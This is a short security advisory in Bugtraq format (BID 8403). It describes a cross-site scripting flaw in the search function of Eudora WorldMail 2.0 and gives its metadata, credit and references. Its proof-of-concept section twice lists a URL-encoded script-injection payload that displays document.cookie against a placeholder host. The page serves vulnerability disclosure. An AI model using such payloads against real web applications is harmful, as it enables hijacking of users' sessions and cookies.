Eudora WorldMail Search Cross-Site Scripting Vulnerability
BID:8403
Info
Eudora WorldMail Search Cross-Site Scripting Vulnerability
| Bugtraq ID: | 8403 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 12 2003 12:00AM |
| Updated: | Aug 12 2003 12:00AM |
| Credit: | The disclosure of this vulnerability has been credited to Donnie Werner <[email protected]>. |
| Vulnerable: |
Eudora WorldMail 2.0 |
| Not Vulnerable: | |
Exploit / POC
Eudora WorldMail Search Cross-Site Scripting Vulnerability
The following example was submitted:
http://www.example.com:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E
The following example was submitted:
http://www.example.com:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E
References
Eudora WorldMail Search Cross-Site Scripting Vulnerability
References:
References:
- Eudora Product Homepage (Qualcomm)
- WorldMail Server Homepage (Qualcomm)